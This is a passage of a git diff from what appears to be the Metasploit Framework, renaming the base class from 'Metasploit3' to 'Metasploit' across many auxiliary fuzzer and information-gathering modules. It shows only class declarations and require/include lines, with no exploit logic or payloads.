a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index fb5cad0492..02bb8a4665 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index fbb1368b86..b9a67af0e9 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 658ecdee4a..31529a3c39 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 9074760d1c..83b25f4d49 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 611c33d0ca..e3a084fc63 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index f0b00f0fe1..3a41b9357d 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index f87821d32b..4018d3ba0a 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index c8edc3c0ed..57616bb9be 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index bebf1f081f..99567349cd 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 887dcea57d..266d7bf36a 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 17a4f0336b..31dc8df62b 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index eb9574bbff..99c7a12eec 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index af2359c05b..3e67b970be 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb index 98d347f89d..15431a3515 100644 --- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb +++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' require 'uri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb index 4c37acb610..3cd7d3cf8a 100644 --- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb +++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index b185233021..538299f505 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index ade049c58b..99838cffd9 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 8160691034..80ef84d00d 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index bfaf631e24..ca97619e74 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index e6ca939df3..1229a89c52 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index cf83fbecc9..c021547369 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index de42cb7159..e8277350f8 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c87615aa62..22d1718e5c 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 3b4794fa3f..4b36a9f1c8 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/dns/resolver' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index 0834c5c16e..78f1563b45 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 4726b53de9..83f87892bc 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb index 31866fb56a..de83c0ea74 100644 --- a/modules/auxiliary/gather/dns_srv_enum.rb +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index 0967baf944..89db08731c 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index 6110eb4ed8..1135430e17 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index 0fe0e0039c..e30e47d286 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 6310586fc2..b471168ad8 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 7c19308176..80ed6a3987 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/eventlog_cred_disclosure.rb b/modules/auxiliary/gather/eventlog_cred_disclosure.rb index 6d58c3b95b..4315b3bc2c 100644 --- a/modules/auxiliary/gather/eventlog_cred_disclosure.rb +++ b/modules/auxiliary/gather/eventlog_cred_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/external_ip.rb b/modules/auxiliary/gather/external_ip.rb index 5eb3919f80..6fab317599 100644 --- a/modules/auxiliary/gather/external_ip.rb +++ b/modules/auxiliary/gather/external_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index e7b7b72f02..666959417f 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb index 80e049155d..1c64e7bc92 100644 --- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb +++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb index 9e5643d353..f9ec82aac5 100644 --- a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb +++ b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_enum_perfd.rb b/modules/auxiliary/gather/hp_enum_perfd.rb index 1a51760858..370246f3b4 100644 --- a/modules/auxiliary/gather/hp_enum_perfd.rb +++ b/modules/auxiliary/gather/hp_enum_perfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index ad4b1c1cd2..8061759f9f 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index 83e648b066..559ed1a179 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb +++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -6,7 +6,7 @@ require 'base64' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index 20b3d6911b..81e3cea8b8 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index 07cf026d44..e359ae331d 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index d9ea98a4e6..22bf5815ed 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ie_uxss_injection.rb b/modules/auxiliary/gather/ie_uxss_injection.rb index f270a2eba2..1ca1c64c9b 100644 --- a/modules/auxiliary/gather/ie_uxss_injection.rb +++ b/modules/auxiliary/gather/ie_uxss_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index b16a028b08..3db58c6bc0 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/auxiliary/gather/jenkins_cred_recovery.rb b/modules/auxiliary/gather/jenkins_cred_recovery.rb index 3c7ed07bb3..08dfa3c9f6 100644 --- a/modules/auxiliary/gather/jenkins_cred_recovery.rb +++ b/modules/auxiliary/gather/jenkins_cred_recovery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_weblinks_sqli.rb b/modules/auxiliary/gather/joomla_weblinks_sqli.rb index 06bb238dd1..30a22110ab 100644 --- a/modules/auxiliary/gather/joomla_weblinks_sqli.rb +++ b/modules/auxiliary/gather/joomla_weblinks_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 27092ab4f4..595a47ce26 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb +++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb index 484c796beb..63f28e3004 100644 --- a/modules/auxiliary/gather/lansweeper_collector.rb +++ b/modules/auxiliary/gather/lansweeper_collector.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb index 4d3803f39a..5150c5a4cb 100644 --- a/modules/auxiliary/gather/mcafee_epo_xxe.rb +++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index 72df26dd36..d3025306f9 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ms14_052_xmldom.rb b/modules/auxiliary/gather/ms14_052_xmldom.rb index 763be66084..cb33c29861 100644 --- a/modules/auxiliary/gather/ms14_052_xmldom.rb +++ b/modules/auxiliary/gather/ms14_052_xmldom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 394b1facdf..8971d710af 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index fe78628201..29661effd1 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index bd2c72c701..0d57bcfbbf 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Exploit::Format::Webarchive diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 70e60de0ec..467a13265a 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/solarwinds_orion_sqli.rb b/modules/auxiliary/gather/solarwinds_orion_sqli.rb index 50ea93d350..65de8a4606 100644 --- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb +++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..5c714d8e06 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -8,7 +8,7 @@ require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end diff --git a/modules/auxiliary/gather/trackit_sql_domain_creds.rb b/modules/auxiliary/gather/trackit_sql_domain_creds.rb index 68b1c93e02..9e9b070b34 100644 --- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb +++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index d7de619453..7c50c769e5 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index c88ab1fc3f..8dc2670f47 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/dcerpc' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index f3aed3ef04..1d42a9d7d9 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index d302309b70..105e82c1f2 100644 --- 